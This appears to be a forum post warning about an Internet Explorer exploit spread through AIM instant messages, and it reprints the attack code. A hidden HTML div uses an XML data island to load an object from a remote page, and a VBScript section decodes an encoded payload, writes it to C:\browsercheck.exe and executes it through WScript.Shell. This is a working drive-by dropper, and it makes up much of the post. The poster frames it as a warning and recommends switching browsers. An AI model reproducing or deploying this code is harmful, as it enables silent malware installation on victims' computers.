This is the newest IE exploit going around. There's a version of it going around on AIM where you will get a IM from an buddy that has the virus telling you to visit a website.
Simple FIX: DON'T RUN IE. Its sucks and its full of un-patched holes that can lead to problems like this. Some are more then 2 years old. Use mozilla.
Here's the exploit
Code:
<div style="visibility:hidden;position:absolute;top:30px;left:20px;z-index:2">
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" data="drunkchicks.php"></object>
]]>
</exploit>
</security>
</xml>
</div>
that passes you to a drunkchicks.php which opens up the exploit
Here is a section of it
Code:
function res(x,y)
For k = 0 To UBound(v)
v(k) = Replace(v(k), x, y)
Next
End Function
res "z", "ff"
res "y", "00"
For m = 0 To UBound(v)
it = it & v(m)
Next
tmp = Split(it, ",")
Set WshShell = CreateObject("WScript.Shell")
Set WshEnv = WshShell.Environment("Process")
pth = WshEnv("HOMEDRIVE") & WshEnv("HOMEPATH") & "\browsercheck.exe"
pth = "C:\browsercheck.exe"
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.CreateTextFile(pth, True)
For i = 0 To UBound(tmp)
l = Len(tmp(i))
b = Int("&H" & Left(tmp(i), 2))
If l > 2 Then
r = Int("&H" & Mid(tmp(i), 3, l-2))
For j = 1 To r
f.Write Chr(b)
Next
Else
f.Write Chr(b)
End If
Next
f.Close
WshShell.run("""" & pth & """")
the payload is encoded. I don't know VB all that well but it looks like simple ascii encoding. If i get bored I'll see if i can decode it
If only the tabbrowser pluggin worked 100%, I'd have fully switched, as it is, I still run both.
Linear Mode
